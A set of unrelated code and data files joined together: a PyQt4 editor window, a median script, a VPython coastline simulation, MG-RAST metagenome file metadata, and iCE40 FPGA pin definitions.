if 'tax_optimization_mode' in d:
o.tax_optimization_mode = d['tax_optimization_mode']
if 'termination_time' in d:
o.termination_time = d['termination_time']
if 'two_party_status' in d:
o.two_party_status = d['two_party_status']
return o
|
# coding: UTF-8
# !/usr/bin/env python
import os
import common, constants
from PyQt4 import QtCore, QtGui
from editor import Editors, CodeEditor, SqlDatabaseDialog, ConnectionListDocker
from settings import Setting
class MainWindow(QtGui.QMainWindow):
    """Top-level window of a tabbed text/SQL editor (PyQt4, Python 2).

    Builds the menus, toolbars and the dockable database-connection list,
    and delegates all editing/search/database operations to the editor
    widget of the currently active tab.
    """

    def __init__(self, parent=None):
        super(MainWindow, self).__init__(parent)
        # Tab widget that holds the editors (created in init_layout).
        self.editors = None
        self.options = Setting()
        self.recent_files_menu = None
        self.toolbar_menu = None
        self.setContentsMargins(0, 0, 0, 0)
        self.conn_list = ConnectionListDocker(self)
        self.init_layout()
        # Start with one empty, untitled editor tab.
        self.new_file()
        self.setWindowIcon(QtGui.QIcon(os.path.join(common.get_root_path(), 'logo.ico')))

    def about(self):
        """Show the "About" box (text kept from the Qt syntax-highlighter example)."""
        QtGui.QMessageBox.about(self, "About Syntax Highlighter",
                "<p>The <b>Syntax Highlighter</b> example shows how to "
                "perform simple syntax highlighting by subclassing the "
                "QSyntaxHighlighter class and describing highlighting "
                "rules using regular expressions.</p>")

    def init_layout(self):
        """Create the central editor widget, menus, toolbars and dock widgets."""
        # Editor area
        self.editors = Editors(self, self.options)
        self.setCentralWidget(self.editors)
        self.init_menu()
        self.init_file_toolbar()
        self.init_edit_toolbar()
        self.init_db_toolbar()
        self.addDockWidget(QtCore.Qt.LeftDockWidgetArea, self.conn_list)
        # The connection list stays hidden until a database is connected.
        self.conn_list.hide()

    def init_menu(self):
        """Populate the menu bar."""
        # File menu
        self.init_file_menu()
        # Edit menu
        self.init_edit_menu()
        # Search menu
        self.init_search_menu()
        # View menu
        self.init_view_menu()
        self.init_database_menu()

    def init_file_menu(self):
        """Build the File menu: new/open/save, reopen-with-codec submenu, MRU lists."""
        file_menu = QtGui.QMenu(u"ファイル(&F)", self)
        self.menuBar().addMenu(file_menu)
        file_menu.addAction(common.get_icon('new_file'), u"新規(&N)", self.new_file, "Ctrl+N")
        file_menu.addAction(common.get_icon('open_file'), u"開く(&O)...", self.open_file, "Ctrl+O")
        codec_menu = file_menu.addMenu(u"開き直す")
        # One QSignalMapper fans all codec actions into
        # menu_item_clicked(codec_name).
        signal_mapper = QtCore.QSignalMapper(self)
        for codec in sorted(CodeEditor.CODEC_LIST):
            action = QtGui.QAction(str(codec), codec_menu)
            self.connect(action, QtCore.SIGNAL('triggered()'), signal_mapper, QtCore.SLOT('map()'))
            signal_mapper.setMapping(action, str(codec))
            codec_menu.addAction(action)
        codec_menu.addSeparator()
        # Submenu listing every codec Qt knows about, not just the curated list.
        codec_menu_all = QtGui.QMenu(u"すべて(&A)", self)
        codec_menu.addMenu(codec_menu_all)
        for codec in sorted(QtCore.QTextCodec.availableCodecs(), key=lambda s: str(s).lower()):
            action = QtGui.QAction(str(codec), codec_menu_all)
            self.connect(action, QtCore.SIGNAL('triggered()'), signal_mapper, QtCore.SLOT('map()'))
            signal_mapper.setMapping(action, str(codec))
            codec_menu_all.addAction(action)
        self.connect(signal_mapper, QtCore.SIGNAL('mapped(QString)'), self.menu_item_clicked)
        file_menu.addSeparator()
        file_menu.addAction(common.get_icon('save_file'), u"上書き保存(&S)", self.save_file, "Ctrl+S")
        file_menu.addAction(common.get_icon('save_as_file'), u"名前を付けて保存(&A)...", self.save_as_file, "Ctrl+Shift+S")
        file_menu.addSeparator()
        file_menu.addAction(common.get_icon('close_file'), u"閉じる(&C)", self.close_file, "Ctrl+F4")
        file_menu.addSeparator()
        # Recently used files / folders
        self.recent_files_menu = file_menu.addMenu(u"最近使ったファイル(&F)")
        self.recent_folders_menu = file_menu.addMenu(u"最近使ったフォルダ(&D)")
        self.init_recent_files_menu()
        file_menu.addSeparator()
        file_menu.addAction(u"終了(&X)", QtGui.qApp.quit, "Ctrl+Q")

    def init_recent_files_menu(self):
        """Rebuild the recent-files and recent-folders submenus from settings."""
        self.recent_files_menu.clear()
        mapper_recent_files = QtCore.QSignalMapper(self)
        for recent_file in self.options.recently.get_files():
            action = QtGui.QAction(recent_file, self.recent_files_menu)
            self.connect(action, QtCore.SIGNAL('triggered()'), mapper_recent_files, QtCore.SLOT('map()'))
            mapper_recent_files.setMapping(action, recent_file)
            self.recent_files_menu.addAction(action)
        self.connect(mapper_recent_files, QtCore.SIGNAL('mapped(QString)'), self.recent_file_clicked)
        self.recent_folders_menu.clear()
        mapper_recent_folders = QtCore.QSignalMapper(self)
        for recent_folder in self.options.recently.get_folders():
            action = QtGui.QAction(recent_folder, self.recent_folders_menu)
            self.connect(action, QtCore.SIGNAL('triggered()'), mapper_recent_folders, QtCore.SLOT('map()'))
            mapper_recent_folders.setMapping(action, recent_folder)
            self.recent_folders_menu.addAction(action)
        self.connect(mapper_recent_folders, QtCore.SIGNAL('mapped(QString)'), self.recent_folder_clicked)

    def init_edit_menu(self):
        """Build the Edit menu (undo/redo, reformat, whitespace trim, comment toggle)."""
        edit_menu = QtGui.QMenu(u"編集(&E)", self)
        self.menuBar().addMenu(edit_menu)
        edit_menu.addAction(common.get_icon('undo'), constants.MENU_EDIT_UNDO, self.editor_undo, QtGui.QKeySequence.Undo)
        edit_menu.addAction(common.get_icon('redo'), constants.MENU_EDIT_REDO, self.editor_redo, QtGui.QKeySequence.Redo)
        edit_menu.addSeparator()
        edit_menu.addAction(u"ソース整形", self.source_reformat, "Ctrl+Shift+F")
        edit_menu.addSeparator()
        edit_menu.addAction(u"左(先頭)の空白を削除", self.delete_left_space, "ALT+L")
        edit_menu.addAction(u"右(末尾)の空白を削除", self.delete_right_space, "ALT+R")
        edit_menu.addSeparator()
        edit_menu.addAction(u"コメント設定・解除(&C)", self.comment_out, "Ctrl+/")

    def init_search_menu(self):
        """Build the Search menu (find, bookmarks, jump-to-line)."""
        search_menu = QtGui.QMenu(u"検索(&S)", self)
        self.menuBar().addMenu(search_menu)
        search_menu.addAction(u"検索(&F)...", self.show_find_dialog, "Ctrl+F")
        search_menu.addAction(u"次を検索(&N)", self.find_next, "F3")
        search_menu.addAction(u"前を検索(&P)", self.find_prev, "Shift+F3")
        search_menu.addAction(u"検索文字列の切替(&C)", self.change_find_text, "Ctrl+F3")
        search_menu.addSeparator()
        bookmark_menu = QtGui.QMenu(u"ブックマーク(&M)", self)
        bookmark_menu.addAction(u"ブックマーク設定・解除(&S)", self.set_bookmark, "Ctrl+F2")
        bookmark_menu.addAction(u"次のブックマークへ(&A)", self.next_bookmark, "F2")
        bookmark_menu.addAction(u"前のブックマークへ(&Z)", self.prev_bookmark, "Shift+F2")
        bookmark_menu.addAction(u"ブックマークの全解除(&X)", self.clear_bookmark, "Ctrl+Shift+F2")
        bookmark_menu.addAction(u"ブックマークの一覧(&V)", self.view_bookmarks, "ALT+F2")
        search_menu.addMenu(bookmark_menu)
        search_menu.addAction(u"指定行へジャンプ(&J)...", self.jump_to_line, "Ctrl+J")

    def init_view_menu(self):
        """Build the View menu (sub-window toggles, window and toolbar submenus)."""
        view_menu = QtGui.QMenu(u"表示(&V)", self)
        self.menuBar().addMenu(view_menu)
        view_menu.addAction(common.get_icon('win_v_sep'), u"ウインドウを表示/隠す(&B)", self.show_bottom_window, "F4")
        view_menu.addAction(common.get_icon('win_h_sep'), u"ウインドウを表示/隠す(&R)", self.show_right_window, "F6")
        view_menu.addSeparator()
        self.window_menu = QtGui.QMenu(u"ウインドウ(&W)", self)
        view_menu.addMenu(self.window_menu)
        self.window_menu.addAction(self.conn_list.toggleViewAction())
        # Toolbar visibility toggles are appended here by the init_*_toolbar methods.
        self.toolbar_menu = QtGui.QMenu(u"ツールバー(&T)", self)
        view_menu.addMenu(self.toolbar_menu)

    def init_database_menu(self):
        """Build the Database menu (connect, connection list, run SQL)."""
        db_menu = QtGui.QMenu(u"データベース(&D)", self)
        self.menuBar().addMenu(db_menu)
        db_menu.addAction(common.get_icon('database_add'), u"データベース追加(&A)", self.connect_database)
        db_menu.addAction(common.get_icon('database_list'), u"接続したデータベース(&L)", self.connected_database, "Ctrl+H")
        db_menu.addAction(common.get_icon('right_arrow'), u"SQLを実行(&E)", self.execute_sql, "F5")

    def init_file_toolbar(self):
        """Create the file-operations toolbar."""
        toolbar = self.addToolBar(constants.TOOLBAR_FILE)
        self.toolbar_menu.addAction(toolbar.toggleViewAction())
        toolbar.setIconSize(QtCore.QSize(16, 16))
        toolbar.addAction(common.get_icon('new_file'), u"新規(Ctrl+N)", self.new_file)
        toolbar.addAction(common.get_icon('open_file'), u"開く(Ctrl+O)", self.open_file)
        toolbar.addAction(common.get_icon('save_file'), u"上書き保存(Ctrl+S)", self.save_file)
        toolbar.addAction(common.get_icon('save_as_file'), u"名前を付けて保存(Ctrl+Shift+S)", self.save_as_file)
        toolbar.addAction(common.get_icon('close_file'), u"閉じる(Ctrl+F4)", self.close_file)

    def init_edit_toolbar(self):
        """Create the edit (undo/redo) toolbar."""
        toolbar = self.addToolBar(constants.TOOLBAR_EDIT)
        self.toolbar_menu.addAction(toolbar.toggleViewAction())
        toolbar.setIconSize(QtCore.QSize(16, 16))
        toolbar.addAction(common.get_icon('undo'), constants.MENU_EDIT_UNDO, self.editor_undo)
        toolbar.addAction(common.get_icon('redo'), constants.MENU_EDIT_REDO, self.editor_redo)

    def init_db_toolbar(self, connection=None):
        """Create or rebuild the database toolbar.

        Called again after each new connection so the connection combo box
        reflects the current state; an existing toolbar is cleared and
        repopulated rather than duplicated.
        """
        toolbar = self.get_toolbar(constants.TOOLBAR_DATABASE_NAME)
        if not toolbar:
            toolbar = self.addToolBar(constants.TOOLBAR_DATABASE_NAME)
            self.toolbar_menu.addAction(toolbar.toggleViewAction())
            toolbar.setIconSize(QtCore.QSize(16, 16))
        else:
            toolbar.clear()
        # Connect to a database
        toolbar.addAction(common.get_icon('database_add'), u"データベースに接続する。", self.connect_database)
        toolbar.addAction(common.get_icon('database_list'), u"接続したデータベース", self.connected_database)
        # Currently connected databases
        if connection and connection.database_name:
            combo_box = QtGui.QComboBox()
            for i, conn in enumerate(connection.get_connections()):
                combo_box.addItem(conn.get_connection_name())
                if conn.get_connection_name() == connection.get_connection_name():
                    combo_box.setCurrentIndex(i)
            combo_box.setFixedWidth(150)
            # Let the popup list grow wider than the fixed-width combo box.
            sp = combo_box.view().sizePolicy()
            sp.setHorizontalPolicy(QtGui.QSizePolicy.MinimumExpanding)
            combo_box.view().setSizePolicy(sp)
            toolbar.addWidget(combo_box)
        # Execute SQL.
        toolbar.addAction(common.get_icon('right_arrow'), u"SQLを実行する。", self.execute_sql)
        # Window split toggles
        toolbar.addSeparator()
        toolbar.addAction(common.get_icon('win_v_sep'), u"ウインドウを表示/隠す。(F4)", self.show_bottom_window)
        toolbar.addAction(common.get_icon('win_h_sep'), u"ウインドウを表示/隠す。(F6)", self.show_right_window)

    def set_window_title(self, title):
        self.setWindowTitle(title)

    def menu_item_clicked(self, name):
        """Reopen the current file with the codec chosen from the codec menu."""
        if name and self.get_current_editor().path:
            self.open_file(self.get_current_editor().path, name)

    def recent_file_clicked(self, file_path):
        self.open_file(file_path)

    def recent_folder_clicked(self, folder_path):
        self.open_file(folder=folder_path)

    def new_file(self):
        """Open a new, empty editor tab."""
        self.editors.add_editor(None)

    def open_file(self, path=None, codec=None, folder=None):
        self.editors.open_file(path, codec, folder)

    def save_file(self):
        self.editors.save_file()

    def save_as_file(self):
        self.editors.save_as_file()

    def close_file(self):
        """Close the currently active editor tab."""
        self.editors.removeTab(self.editors.currentIndex())

    # --- Thin delegates to the active editor; all are no-ops when no tab
    # --- with a code editor is active.
    def delete_left_space(self):
        code_editor = self.get_current_editor()
        if code_editor:
            code_editor.delete_left_space()

    def delete_right_space(self):
        code_editor = self.get_current_editor()
        if code_editor:
            code_editor.delete_right_space()

    def comment_out(self):
        code_editor = self.get_current_editor()
        if code_editor:
            code_editor.comment_out()

    def editor_undo(self):
        code_editor = self.get_current_editor()
        if code_editor:
            # NOTE(review): leftover debug output (Python 2 print statement).
            print 'undo'
            code_editor.undo()

    def editor_redo(self):
        code_editor = self.get_current_editor()
        if code_editor:
            # NOTE(review): leftover debug output (Python 2 print statement).
            print 'redo'
            code_editor.redo()

    def source_reformat(self):
        if self.get_current_editor():
            self.get_current_editor().reformat()

    def show_find_dialog(self):
        if self.get_current_editor():
            self.get_current_editor().show_find_dialog()

    def find_next(self):
        if self.get_current_editor():
            self.get_current_editor().find_text(False)

    def find_prev(self):
        if self.get_current_editor():
            self.get_current_editor().find_text(True)

    def change_find_text(self):
        """Use the current selection as the new search string."""
        code_editor = self.get_current_editor()
        if code_editor:
            cursor = code_editor.textCursor()
            # NOTE(review): hasSelection() result is discarded; selectedText()
            # is used regardless — presumably intentional, but confirm.
            cursor.hasSelection()
            txt = cursor.selectedText()
            code_editor.finding.text = txt
            code_editor.finding.show_found_text_pos()

    def set_bookmark(self):
        code_editor = self.get_current_editor()
        if code_editor:
            code_editor.set_bookmark()

    def next_bookmark(self):
        code_editor = self.get_current_editor()
        if code_editor:
            code_editor.next_bookmark()

    def prev_bookmark(self):
        code_editor = self.get_current_editor()
        if code_editor:
            code_editor.prev_bookmark()

    def clear_bookmark(self):
        code_editor = self.get_current_editor()
        if code_editor:
            code_editor.clear_bookmark()

    def view_bookmarks(self):
        code_editor = self.get_current_editor()
        if code_editor:
            code_editor.show_bookmarks_dialog()

    def jump_to_line(self):
        code_editor = self.get_current_editor()
        if code_editor:
            code_editor.show_jump_dialog()

    def connect_database(self):
        """Show the connection dialog; returns the new connection or None."""
        sql_tab = self.get_current_tab()
        dialog = SqlDatabaseDialog(self, self.options)
        ret = dialog.exec_()
        if ret == QtGui.QDialog.Accepted:
            if sql_tab:
                sql_tab.set_connection(dialog.connection)
            # Rebuild the DB toolbar so the combo box shows the new connection.
            self.init_db_toolbar(dialog.connection)
            self.conn_list.add_connection(dialog.connection)
            self.conn_list.setVisible(True)
            return dialog.connection
        return None

    def connected_database(self):
        """Toggle visibility of the connection-list dock."""
        self.conn_list.setVisible(not self.conn_list.isVisible())

    def execute_sql(self):
        """Run the current tab's SQL, prompting for a connection if needed."""
        sql_tab = self.get_current_tab()
        if sql_tab:
            if sql_tab.connection:
                sql_tab.execute_sql()
            else:
                if self.connect_database():
                    sql_tab.execute_sql()

    def show_bottom_window(self):
        tab = self.get_current_tab()
        if tab:
            tab.show_bottom_window()

    def show_right_window(self):
        tab = self.get_current_tab()
        if tab:
            tab.show_right_window()

    def get_current_editor(self):
        """Return the active tab's code editor, or None if there is none."""
        if self.editors:
            if hasattr(self.editors.currentWidget(), 'code_editor'):
                return self.editors.currentWidget().code_editor
        return None

    def get_current_tab(self):
        """Return the active tab widget, or None."""
        if self.editors:
            return self.editors.currentWidget()
        else:
            return None

    def get_toolbar(self, window_title):
        """Find an existing toolbar by its window title, or None."""
        for toolbar in self.findChildren(QtGui.QToolBar):
            if toolbar.windowTitle() == window_title:
                return toolbar
        return None

    def closeEvent(self, event):
        """Close every editor tab before the window closes."""
        for i in range(self.editors.count()):
            editor = self.editors.widget(i)
            editor.close()
        event.accept()
if __name__ == '__main__':
    # Script entry point: create the Qt application and show the main window.
    import sys
    app = QtGui.QApplication(sys.argv)
    window = MainWindow()
    #window.showMaximized()
    window.resize(1224, 800)
    window.show()
    sys.exit(app.exec_())
|
# Number of (A, B) interval pairs to read from stdin.
N = int(input())
def median(N):
    """Return the median of a non-empty list of numbers.

    Sorts *N* in place (as the original did).  For an even count the
    median is the mean of the two middle elements; for an odd count it
    is the single middle element.

    Fixes vs. the original: ``/`` produced float indices (a TypeError on
    Python 3), and both branches were off by one — the even case read
    ``N[n/2]`` and ``N[n/2 + 1]`` instead of the two middle elements
    ``N[n//2 - 1]`` and ``N[n//2]``, and the odd case read
    ``N[(n + 1)/2]`` instead of ``N[n//2]``.
    """
    N.sort()
    mid = len(N) // 2  # floor division: a valid int index
    if len(N) % 2 == 0:
        # Even count: average the two middle elements.
        return (N[mid - 1] + N[mid]) / 2
    # Odd count: the single middle element.
    return N[mid]
# Read N inclusive intervals and expand each into an explicit list.
# NOTE(review): median() defined above is never called in this visible code.
Xl = []
for i in range(N):
    A, B = map(int, input().split())
    X = list(range(A, B + 1))
    Xl.append(X)
print(Xl)
|
#
from visual import *
from visual.graph import *
import random
# Random-deposition model of a coastline, plotted with VPython's graph module.
# 5000 particles are dropped at random columns of a 200-wide grid; a particle
# fills a "hole" (jumps up to a taller neighbour's height) when a neighbour is
# higher, otherwise it stacks one unit on its own column.
Minx = 0  # min value x axis
Maxx = 200  # max value x axis
Miny = 0  # for y axis
Maxy = 60
g = gdisplay(width=500, height=500, title="Coastline", xtitle='x', ytitle='coast', xmin=Minx, xmax=Maxx, ymin=Miny, ymax=Maxy)
seacoast = gcurve(color=color.yellow)
coast = zeros((200))  # height of each column (zeros comes from `visual`'s numpy re-export — confirm)
for i in range(0, 5000):  # All particles dropped
    spot = int(200 * random.random())  # generate random column in [0, 199]
    if (spot == 0):  # Hitting edge counts as filling hole
        # Left edge: only the right neighbour exists.
        if (coast[spot] < coast[spot + 1]):
            coast[spot] = coast[spot + 1]
        else:
            coast[spot] = coast[spot] + 1
    else:
        if (spot == 199):
            # Right edge: only the left neighbour exists.
            if (coast[spot] < coast[spot - 1]):
                coast[spot] = coast[spot - 1]
            else:
                coast[spot] = coast[spot] + 1
        else:
            # Interior column: a hole only if BOTH neighbours are taller;
            # it then rises to the taller of the two.
            if ((coast[spot] < coast[spot - 1]) and
                    (coast[spot] < coast[spot + 1])):
                if (coast[spot - 1] > coast[spot + 1]):
                    coast[spot] = coast[spot - 1]
                else:
                    coast[spot] = coast[spot + 1]
            else:
                coast[spot] = coast[spot] + 1
for i in range(0, 200):
    seacoast.plot(pos=(i, coast[i]))  # plot coastline
|
{
"id": "mgm4458721.3",
"metadata": {
"mgm4458721.3.metadata.json": {
"format": "json",
"provider": "metagenomics.anl.gov"
}
},
"providers": {
"metagenomics.anl.gov": {
"files": {
"100.preprocess.info": {
"compression": null,
"description": null,
"size": 736,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/100.preprocess.info"
},
"100.preprocess.passed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 189026,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/100.preprocess.passed.fna.gz"
},
"100.preprocess.passed.fna.stats": {
"compression": null,
"description": null,
"size": 309,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/100.preprocess.passed.fna.stats"
},
"100.preprocess.removed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 3739,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/100.preprocess.removed.fna.gz"
},
"100.preprocess.removed.fna.stats": {
"compression": null,
"description": null,
"size": 303,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/100.preprocess.removed.fna.stats"
},
"205.screen.h_sapiens_asm.info": {
"compression": null,
"description": null,
"size": 477,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/205.screen.h_sapiens_asm.info"
},
"205.screen.h_sapiens_asm.removed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 177,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/205.screen.h_sapiens_asm.removed.fna.gz"
},
"299.screen.info": {
"compression": null,
"description": null,
"size": 410,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/299.screen.info"
},
"299.screen.passed.fna.gcs": {
"compression": null,
"description": null,
"size": 1634,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/299.screen.passed.fna.gcs"
},
"299.screen.passed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 120417,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/299.screen.passed.fna.gz"
},
"299.screen.passed.fna.lens": {
"compression": null,
"description": null,
"size": 488,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/299.screen.passed.fna.lens"
},
"299.screen.passed.fna.stats": {
"compression": null,
"description": null,
"size": 309,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/299.screen.passed.fna.stats"
},
"440.cluster.rna97.fna.gz": {
"compression": "gzip",
"description": null,
"size": 14068,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/440.cluster.rna97.fna.gz"
},
"440.cluster.rna97.fna.stats": {
"compression": null,
"description": null,
"size": 306,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/440.cluster.rna97.fna.stats"
},
"440.cluster.rna97.info": {
"compression": null,
"description": null,
"size": 947,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/440.cluster.rna97.info"
},
"440.cluster.rna97.mapping": {
"compression": null,
"description": null,
"size": 244540,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/440.cluster.rna97.mapping"
},
"440.cluster.rna97.mapping.stats": {
"compression": null,
"description": null,
"size": 48,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/440.cluster.rna97.mapping.stats"
},
"450.rna.expand.lca.gz": {
"compression": "gzip",
"description": null,
"size": 137286,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/450.rna.expand.lca.gz"
},
"450.rna.expand.rna.gz": {
"compression": "gzip",
"description": null,
"size": 33446,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/450.rna.expand.rna.gz"
},
"450.rna.sims.filter.gz": {
"compression": "gzip",
"description": null,
"size": 21752,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/450.rna.sims.filter.gz"
},
"450.rna.sims.gz": {
"compression": "gzip",
"description": null,
"size": 228544,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/450.rna.sims.gz"
},
"900.abundance.function.gz": {
"compression": "gzip",
"description": null,
"size": 11982,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/900.abundance.function.gz"
},
"900.abundance.lca.gz": {
"compression": "gzip",
"description": null,
"size": 8583,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/900.abundance.lca.gz"
},
"900.abundance.md5.gz": {
"compression": "gzip",
"description": null,
"size": 16619,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/900.abundance.md5.gz"
},
"900.abundance.ontology.gz": {
"compression": "gzip",
"description": null,
"size": 43,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/900.abundance.ontology.gz"
},
"900.abundance.organism.gz": {
"compression": "gzip",
"description": null,
"size": 25459,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/900.abundance.organism.gz"
},
"900.loadDB.sims.filter.seq": {
"compression": null,
"description": null,
"size": 2102803,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/900.loadDB.sims.filter.seq"
},
"900.loadDB.source.stats": {
"compression": null,
"description": null,
"size": 121,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/900.loadDB.source.stats"
},
"999.done.COG.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.COG.stats"
},
"999.done.KO.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.KO.stats"
},
"999.done.NOG.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.NOG.stats"
},
"999.done.Subsystems.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.Subsystems.stats"
},
"999.done.class.stats": {
"compression": null,
"description": null,
"size": 687,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.class.stats"
},
"999.done.domain.stats": {
"compression": null,
"description": null,
"size": 36,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.domain.stats"
},
"999.done.family.stats": {
"compression": null,
"description": null,
"size": 2463,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.family.stats"
},
"999.done.genus.stats": {
"compression": null,
"description": null,
"size": 3254,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.genus.stats"
},
"999.done.order.stats": {
"compression": null,
"description": null,
"size": 1225,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.order.stats"
},
"999.done.phylum.stats": {
"compression": null,
"description": null,
"size": 311,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.phylum.stats"
},
"999.done.rarefaction.stats": {
"compression": null,
"description": null,
"size": 22018,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.rarefaction.stats"
},
"999.done.sims.stats": {
"compression": null,
"description": null,
"size": 79,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.sims.stats"
},
"999.done.species.stats": {
"compression": null,
"description": null,
"size": 9388,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.species.stats"
}
},
"id": "mgm4458721.3",
"provider": "metagenomics.anl.gov",
"providerId": "mgm4458721.3"
}
},
"raw": {
"mgm4458721.3.fna.gz": {
"compression": "gzip",
"format": "fasta",
"provider": "metagenomics.anl.gov",
"url": "http://api.metagenomics.anl.gov/reads/mgm4458721.3"
}
}
} |
import os, csv
from loam import FPGA
from ..lattice import Lattice
from .gpio import Pin, GPIO
from .clock import Clock
from .usart import USART
# Public API of this module: the concrete iCE40 part classes.
__all__ = ['ICE40HX1K', 'ICE40HX8K']
__all__ += ['ICE40LP1K', 'ICE40LP8K']
__all__ += ['ICE40UP5K']
class HX(Lattice):
family = 'ice40'
def __init__(self, name, board):
super(HX,self).__init__(name, board)
self.clock = Clock(self)
self.USART = USART
def VQ100(self):
self.package = 'VQ100'
# Note that these are named as bank / pin
#
# The lattice names are different: see iCE40PinoutHX1K.xlsx
GPIO(self, 'IOL_1A', 1)
GPIO(self, 'IOL_1B', 2)
GPIO(self, 'IOL_2A', 3)
GPIO(self, 'IOL_2B', 4)
GPIO(self, 'IOL_3A', 7)
GPIO(self, 'IOL_3B', 8)
GPIO(self, 'IOL_5A', 9)
GPIO(self, 'IOL_5B', 10)
GPIO(self, 'IOL_6A', 12)
GPIO(self, 'IOL_6B', 13)
GPIO(self, 'IOL_7A', 15)
GPIO(self, 'IOL_7B', 16)
GPIO(self, 'IOL_8A', 18)
GPIO(self, 'IOL_8B', 19)
GPIO(self, 'IOL_10A', 20)
GPIO(self, 'IOL_10B', 21)
GPIO(self, 'IOL_12A', 24)
GPIO(self, 'IOL_12B', 25)
# Bank B
GPIO(self, 'IOB_26', 26)
GPIO(self, 'IOB_27', 27)
GPIO(self, 'IOB_28', 28)
GPIO(self, 'IOB_29', 29)
GPIO(self, 'IOB_30', 30)
# 31 32
GPIO(self, 'IOB_33', 33)
GPIO(self, 'IOB_34', 34)
# 35
GPIO(self, 'IOB_36', 36)
GPIO(self, 'IOB_37', 37)
# 38 39
GPIO(self, 'IOB_40', 40)
GPIO(self, 'IOB_41', 41)
GPIO(self, 'IOB_42', 42)
GPIO(self, 'IOB_43', 43) # CDONE
GPIO(self, 'IOB_44', 44) # CRESET_B
GPIO(self, 'IOB_45', 45) # SDO
GPIO(self, 'IOB_46', 46) # SDI
# 47
GPIO(self, 'IOB_48', 48) # SCK
GPIO(self, 'IOB_49', 49) # SS
# Bank R
GPIO(self, 'IOR_51', 51)
GPIO(self, 'IOR_52', 52)
GPIO(self, 'IOR_53', 53)
GPIO(self, 'IOR_54', 54)
# GND 55
GPIO(self, 'IOR_56', 56)
GPIO(self, 'IOR_57', 57)
# VCC 57
GPIO(self, 'IOR_59', 59)
GPIO(self, 'IOR_60', 60)
# VCC 61
GPIO(self, 'IOR_60_GBIN3', 60)
GPIO(self, 'IOR_61_GBIN2', 61)
GPIO(self, 'IOR_62', 62)
GPIO(self, 'IOR_63', 63)
GPIO(self, 'IOR_64', 64)
GPIO(self, 'IOR_65', 65)
# VCC 67
GPIO(self, 'IOR_68', 68)
GPIO(self, 'IOR_69', 69)
# GND 70
GPIO(self, 'IOR_71', 71)
GPIO(self, 'IOR_72', 72)
GPIO(self, 'IOR_73', 73)
GPIO(self, 'IOR_74', 74)
# VPP 75
# Bank T
GPIO(self, 'IOT_78', 78)
GPIO(self, 'IOT_79', 79)
GPIO(self, 'IOT_80', 80)
GPIO(self, 'IOT_81', 81)
